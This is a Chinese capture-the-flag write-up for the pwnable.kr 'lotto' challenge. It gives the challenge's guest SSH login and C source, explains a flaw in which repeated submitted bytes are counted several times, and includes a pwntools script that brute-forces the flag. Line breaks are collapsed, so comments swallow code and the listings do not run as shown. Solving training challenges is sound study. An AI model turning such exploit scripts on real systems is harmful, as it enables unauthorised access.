ssh lotto@pwnable.kr -p2222 (pw:guest)
題目源碼：

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h>unsigned char submit[6];void play(){int i;printf("Submit your 6 lotto bytes : ");fflush(stdout);int r;r = read(0, submit, 6);printf("Lotto Start!\n");//sleep(1);// generate lotto numbersint fd = open("/dev/urandom", O_RDONLY);if(fd==-1){printf("error. tell admin\n");exit(-1);}unsigned char lotto[6];if(read(fd, lotto, 6) != 6){printf("error2. tell admin\n");exit(-1);}for(i=0; i<6; i++){lotto[i] = (lotto[i] % 45) + 1; // 1 ~ 45}close(fd);// calculate lotto scoreint match = 0, j = 0;for(i=0; i<6; i++){for(j=0; j<6; j++){if(lotto[i] == submit[j]){match++;}}}// win!if(match == 6){system("/bin/cat flag");}else{printf("bad luck...\n");}}void help(){printf("- nLotto Rule -\n");printf("nlotto is consisted with 6 random natural numbers less than 46\n");printf("your goal is to match lotto numbers as many as you can\n");printf("if you win lottery for *1st place*, you will get reward\n");printf("for more details, follow the link below\n");printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");printf("mathematical chance to win this game is known to be 1/8145060.\n"); }int main(int argc, char* argv[]){// menuunsigned int menu;while(1){printf("- Select Menu -\n");printf("1. Play Lotto\n");printf("2. Help\n");printf("3. Exit\n");scanf("%d", &menu);switch(menu){case 1:play();break;case 2:help();break;case 3:printf("bye\n");return 0;default:printf("invalid menu\n");break;}}return 0; }

在驗證的時候有個漏洞，循環匹配的時候如果我們輸入的是重復的6個數字，比如6個1，那個lotto隨機隊列里面只要有一個1就會重復匹配6次。
payload:

from pwn import * s= ssh(host='pwnable.kr',user='lotto',password='guest',port=2222) p = s.process("/home/lotto/lotto") print p.recv() p.sendline('1') print p.recv() lotto = chr(9)*6 p.sendline(lotto) print p.recv() while True:p.sendline('1')print p.recv()p.sendline(lotto)back = p.recv()if "bad luck" not in back:print backbreak

總結

以上是生活随笔為你收集整理的pwnable.kr lotto题解的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。